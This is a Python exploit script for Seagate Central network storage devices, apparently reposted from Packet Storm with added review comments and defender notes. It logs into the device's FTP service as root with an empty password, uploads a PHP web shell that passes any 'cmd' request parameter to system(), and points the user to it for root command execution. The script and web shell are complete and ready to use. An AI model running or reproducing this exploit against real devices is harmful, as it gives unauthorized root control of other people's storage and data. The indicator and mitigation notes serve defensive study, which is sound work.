

#!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into its FTP server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled its updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#

import sys
from ftplib import FTP

# NOTE(review): `port` is assigned but never read anywhere in this file;
# FTP(host) in main() connects on ftplib's default port (21) regardless.
port = 21

# PHP source that main() writes to the device's web root. It runs whatever the
# `cmd` request parameter holds via system(), so an HTTP request carrying a
# `cmd` parameter against the path below is the simplest log-level indicator
# for this script; the file appearing in the web root is the on-disk one.
php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
$cmd = ($_REQUEST["cmd"]);
echo "<pre>$cmd</pre>";
system($cmd);
}
?>
"""

# File name used both for the local staging copy and for the remote upload.
php_shell_filename = "shell.php"
# Directory the device's web server serves (per the header comment); the
# upload lands at seagate_central_webroot + php_shell_filename.
seagate_central_webroot = "/cirrus/"

def main() -> None:
    """Upload the module's PHP file to the target's web root over FTP.

    Reads the host from ``sys.argv[1]``, writes ``php_shell`` to a local file
    named ``php_shell_filename``, logs into the host's FTP service as ``root``
    with no password, and stores the file under ``seagate_central_webroot``.
    Every error is printed and swallowed; the function always returns None.

    Defender notes: the observable artefacts are an FTP login as ``root`` with
    an empty password, a new ``.php`` file appearing in the web root, and later
    HTTP requests carrying a ``cmd`` parameter. The header comment says the
    vendor scheduled a fix for April 2015; keeping the firmware current and
    not exposing the FTP service beyond a trusted network removes the
    precondition this script relies on.
    """
    if(len(sys.argv) < 2):
        print("Usage: %s <host>" % sys.argv[0])
        return

    host = sys.argv[1]

    try:
        # Stage the PHP source on local disk so storbinary() can stream it.
        with open(php_shell_filename, 'w') as file:
            file.write(php_shell)

    except Exception as error:
        # Any local failure (permissions, disk) is reported and ends the run.
        print("Error: %s" % error);
        return

    try:
        ftp = FTP(host)
        # Only the user name is supplied; ftplib sends an empty password.
        # Success here is exactly the passwordless-root condition in the header.
        ftp.login("root")
        # NOTE(review): the read handle opened inline is never closed
        # explicitly; it is released only when the object is collected.
        ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
        ftp.close()

    except Exception as error:
        # Connection, login or STOR failures are reported, not re-raised.
        print("Error: %s" % error);
        return

    print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))

    return

# Script entry point; argument handling lives entirely in main().
if __name__ == "__main__":
    main()

Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt
